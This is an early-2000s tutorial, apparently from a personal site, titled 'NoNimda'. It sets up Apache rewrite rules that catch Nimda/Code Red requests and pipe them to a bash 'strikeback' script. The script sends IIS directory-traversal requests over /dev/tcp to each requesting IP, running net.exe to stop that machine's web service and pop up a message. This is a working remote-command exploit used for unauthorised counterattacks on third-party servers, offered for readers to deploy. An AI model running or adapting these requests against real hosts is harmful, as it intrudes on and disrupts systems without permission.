NoNimda ------- Tired about all code-red requests on your webserver ? This is for all Apache users and possible other web-servers. Before we start: You need to have bash wich "sockets" installed so you can do socket connection from within shellscript. The methode is brute and simple, it is not tested under heavy load yet. (Another version with C and Java program is underway) But we say this, if you can make it simple DO IT SIMPLE. Almost all people understand shellscript, but not C or Java code. To set up: We need to add support for RewriteRules in apache, the idea is to catch nimda requests. This is the tricky part, we cannot ever be totally sure if it is a nimda or someting else. Add this in the ### Section 2: 'Main' server configuration of apache, afther the ServerAdmin root@localhost tag, in httpd.con: RewriteEngine on RewriteCond %{REQUEST_URI} default.ida [OR] RewriteCond %{REQUEST_URI} cmd.exe [OR] RewriteCond %{REQUEST_URI} root.exe RewriteLogLevel 1 RewriteLog |/tmp/strikeback.sh RewriteRule ^.*$ http://www.ing-steen.se [L] The RewriteCond is not specially intelligent written, they will trap everyting that contains default.ida, cmd.exe or root.exe. You need to activate RewriteLogLevel 1, at least. However there are other ways with maps and so on, but we skip them, keep it simple. The log is simply piped to our schellscript in a path there everyone have r-x rights. The shellscript can then deal with the request. This is a rude way to solve this, the shellscript strikeback.sh is called every time anyone is requesting somthing at our apache webserver. The shellscript strikeback.sh looks like this: #!/bin/bash read URI REMOTE=`echo $URI | grep -i redirect | cut -d" " -f1` if [ ! -z $REMOTE ];then echo "GET http://$REMOTE/scripts/..%%35c../winnt/system32/net.exe%20stop%20World%20Wide%20Web%20Publishing%20Service\n\n" > /dev/tcp/$REMOTE/80 echo "GET http:///scripts/..%%35c../winnt/system32/net.exe%20send%20127.0.0.1%20Your%20Web-Server%20is%20contaminated%20by%20a%20trojan%20!!\n\n" > /dev/tcp/$REMOTE/80 fi echo $URI >>/tmp/logtest exit 0 We simply read from stdin and cut out the IP/HOSTNAME, the first word in logfile, to REMOTE. We need to check whenever "redirect" is printed in the log=apache rewrite matched a condition. If REMOTE contain somthing we probely now have one infected server to gently shut down out there. We use a regular URL GET pattern with some modifications, you can send more than one. The one above stop the IIS-WWW-server in a proper way and sends a winpopup message to the administrator. All this is echoed to /dev/tcp/$REMOTE/80, a TCP socket connection to port 80. The log itself is echoed out in a file, just for logging purposes :-)